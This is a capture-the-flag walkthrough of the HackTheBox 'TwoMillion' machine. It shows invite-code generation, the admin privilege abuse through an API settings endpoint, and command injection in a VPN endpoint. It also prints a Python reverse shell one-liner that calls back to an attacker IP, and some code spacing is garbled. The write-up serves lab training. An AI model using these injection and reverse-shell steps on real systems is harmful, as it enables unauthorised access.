A Linux machine retired on the very day it launches for celebrating 2M users on the HackTheBox platform.
Reconnaissance
Hostname
We see the hostname 2million.htb in the HTTP response, so that we put it in our hosts file /etc/hosts.
$curl-ihttp://<IP>
The site is hosted behind an Nginx server, as we can see in the response header Server. Thus we also fuzz the HTTP request Host header, and it seems that there's no other virtual host.
From the pages /invite and /register, we see that a user must have the right invite code to register as a new member.
Invite Code
From the code contained in the functionscript /js/inviteapi.min.js, we see that we can get the invite code by calling the functiono makeInviteCode in page /invite.
From the enctype ROT13 hint, we can assume that the data is encrypted by rotating with offset 13. We can then get the plaintext by the following Python script:
decrypt.py
import stringdefdecrypt(cipher): plain =''for c in cipher:if c in string.ascii_letters: plain +=chr((ord(c.lower())-ord('a')+13) %26+ord('a'))else: plain += cprint(plain)decrypt('Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr')
Then we get the procedure to generate the invite code:
$python3decrypt.pyin order to generate the invite code, make a post request to /api/v1/invite/generate$curl-XPOSThttp://2million.htb/api/v1/invite/generate{"0":200,"success":1,"data":{"code":"R1ZJWFctOUVYNVAtWDg5ME4tSzNCUkc=","format":"encoded"}}$ echo -n 'R1ZJWFctOUVYNVAtWDg5ME4tSzNCUkc=' | base64 -dGVIXW-9EX5P-X890N-K3BRG
We can register a new user with the generated invite code now.
Home Page
After login successfully, we can see the classical HackTheBox home page.
Only /home/access, /home/rules, and /home/changelog pages are functional.
We can download .ovpn file using related API /api/v1/user/vpn/generate, but we can't use it with openvpn to establish a VPN session.
API Endpoints
As an authenticated user, we can get a list of API endpoints via the path /api/v1 now:
$curlhttp://2million.htb/api/v1-l-H'Cookie: PHPSESSID=con8fjcogd68ijh3slf0la0ngb'-s|jq.{"v1":{"user":{"GET":{"/api/v1":"Route List","/api/v1/invite/how/to/generate":"Instructions on invite code generation","/api/v1/invite/generate":"Generate invite code","/api/v1/invite/verify":"Verify invite code","/api/v1/user/auth":"Check if user is authenticated","/api/v1/user/vpn/generate":"Generate a new VPN configuration","/api/v1/user/vpn/regenerate":"Regenerate VPN configuration","/api/v1/user/vpn/download":"Download OVPN file" },"POST":{"/api/v1/user/register":"Register a new user","/api/v1/user/login":"Login with existing user" } },"admin":{"GET":{"/api/v1/admin/auth":"Check if user is admin" },"POST":{"/api/v1/admin/vpn/generate":"Generate VPN for specific user" },"PUT":{"/api/v1/admin/settings/update":"Update user settings" } } }}
Among these endpoints, it seems that we can use the /api/v1/admin/settings/update one with our authenticated user.
We shall inspect all the endpoints to check if authentication broken exists.
After some errors and tries, we figure out the usage of this endpoint and make our user as admin now.
$curl-XPUT-l-H'Cookie: PHPSESSID=<PHPSESSID>'http://2million.htb/api/v1/admin/settings/update-i{"status":"danger","message":"Invalid content type."}$curl-XPUT-l-H'Cookie: PHPSESSID=<PHPSESSID>'http://2million.htb/api/v1/admin/settings/update-i-H'Content-Type: application/json'{"status":"danger","message":"Missing parameter: email"}$curl-XPUT-l-H'Cookie: PHPSESSID=<PHPSESSID>'http://2million.htb/api/v1/admin/settings/update?-d'{"email":"<user email>"}'-i-H'Content-Type: application/json'{"status":"danger","message":"Missing parameter: is_admin"}$curl-XPUT-l-H'Cookie: PHPSESSID=<PHPSESSID>'http://2million.htb/api/v1/admin/settings/update?-d'{"email":"<user email>", "is_admin": "true"}'-i-H'Content-Type: application/json'{"status":"danger","message":"Variable is_admin needs to be either 0 or 1."}$curl-XPUT-l-H'Cookie: PHPSESSID=<PHPSESSID>'http://2million.htb/api/v1/admin/settings/update?-d'{"email":"<user email>", "is_admin": 1}'-i-H'Content-Type: application/json'{"id":13,"username":"<username>","is_admin":1}
We can authenticate as an admin now.
Initial Access
VPN Generation
As before, being an admin now, we can figure out the parameters needed to use the other endpoint /api/v1/admin/vpn/generate:
The response contains an OpenVPN connection configuration. The configuration is generated via calling an external command, most possibly, in the backend, so it's likely that the endpoint may have a command injection vulnerability.
We can confirm our guess by inserting commands like ping -c 1 <our_ip> or sleep 10, etc.
Reverse Shell
To use the one-line reverse shell written in Python:
back.sh
python3-c'import socket,pty,os;s=socket.socket();s.connect(("10.10.14.9",4444));[os.dup2(s.fileno(),i) for i in range(3)];pty.spawn("/bin/bash");'
Now we can log in as admin via SSH into the machine with the above credential now.
Privilege Escalation
Enumeration
After some effort, we found a mail file /var/mail/admin for the user admin.
$ cat /var/mail/admin
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2
Hey admin,
I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.
HTB Godfather
The content suggests kernelthat we may get privilege escalation via a kernerl vulnerability related to the OverlayFS implementation.
Exploit
We can find and use the following exploit to get the root account.
